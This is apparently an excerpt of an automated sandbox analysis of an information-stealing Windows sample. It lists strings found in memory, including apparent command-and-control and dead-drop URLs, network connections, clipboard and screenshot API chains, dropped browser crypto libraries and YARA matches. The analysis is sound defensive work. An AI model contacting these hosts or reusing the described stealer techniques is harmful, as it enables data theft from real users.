                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drString found in binary or memory: http://ocsp.entrust.net02
                Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drString found in binary or memory: http://ocsp.entrust.net03
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://stadiatechnologies.com
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2120226733.0000000000F82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stadiatechnologies.com/
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://stadiatechnologies.comntent-Disposition:
                Source: Amcache.hve.19.drString found in binary or memory: http://upx.sf.net
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, file.exe, KKJEBAAECB.exe.2.dr, freebl3.dll.2.dr, nss3[1].dll.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drString found in binary or memory: http://www.entrust.net/rpa03
                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134269337.000000001D4AD000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                Source: AKFIDH.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: AKFIDH.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: AKFIDH.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: AKFIDH.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: AKFIDH.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: AKFIDH.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: AKFIDH.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: GHJKJD.2.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://mozilla.org0/
                Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199761128941
                Source: EBKJDB.2.drString found in binary or memory: https://support.mozilla.org
                Source: EBKJDB.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: EBKJDB.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp, JEGHJD.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: JEGHJD.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp, JEGHJD.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: JEGHJD.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/iyigunl
                Source: file.exe, 00000000.00000002.1640039128.0000000003C15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, KJKJJJECFI.exe, 0000000A.00000002.2088084259.00000000035A2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2375283743.000000000041E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/iyigunlsql.dllsqlr.dllIn
                Source: RegAsm.exe, 00000009.00000002.2376623871.000000000104D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/
                Source: RegAsm.exe, 00000009.00000002.2376623871.000000000105A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/api
                Source: RegAsm.exe, 00000009.00000002.2376623871.000000000102E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/apibu
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134524747.000000001D7E0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2138560104.0000000023743000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: AKFIDH.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: file.exe, KKJEBAAECB.exe.2.dr, KJKJJJECFI.exe.2.dr, 66d0cd9a65b5d_vqwergf[1].exe.2.dr, 66d0cd8fb6f7b_lgjfd[1].exe.2.drString found in binary or memory: https://www.entrust.net/rpa0
                Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, GHJKJD.2.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: AKFIDH.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: EBKJDB.2.drString found in binary or memory: https://www.mozilla.org
                Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                Source: EBKJDB.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                Source: EBKJDB.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                Source: EBKJDB.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
                Source: EBKJDB.2.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2127216264.000000001720B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                Source: RegAsm.exe, 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
                Source: EBKJDB.2.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_00431530
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00431530 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_00431530
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FF05 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,2_2_0040FF05

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                Source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTRMatched rule: Detects Molerats sample - July 2017 Author: Florian Roth
                .NET source code contains very large array initializations
                Source: file.exe, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 176128
                Source: KKJEBAAECB.exe.2.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 308224
                Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 308224
                Source: KJKJJJECFI.exe.2.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 176128
                Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr, MoveAngles.csLarge array initialization: MoveAngles: array initializer size 176128
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0EED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,2_2_6C0EED10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C12B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C12B700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C12B8C0 rand_s,NtQueryVirtualMemory,2_2_6C12B8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C12B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,2_2_6C12B910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C0CF280
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013E0B440_2_013E0B44
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00419CF92_2_00419CF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004193332_2_00419333
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417F832_2_00417F83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0C35A02_2_6C0C35A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C105C102_2_6C105C10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C112C102_2_6C112C10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C13AC002_2_6C13AC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C13542B2_2_6C13542B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D54402_2_6C0D5440
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C13545C2_2_6C13545C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D6C802_2_6C0D6C80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1234A02_2_6C1234A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C12C4A02_2_6C12C4A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D64C02_2_6C0D64C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0ED4D02_2_6C0ED4D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C106CF02_2_6C106CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CD4E02_2_6C0CD4E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0DFD002_2_6C0DFD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F05122_2_6C0F0512
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0EED102_2_6C0EED10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C100DD02_2_6C100DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1285F02_2_6C1285F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C107E102_2_6C107E10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1156002_2_6C115600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C129E302_2_6C129E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C103E502_2_6C103E50
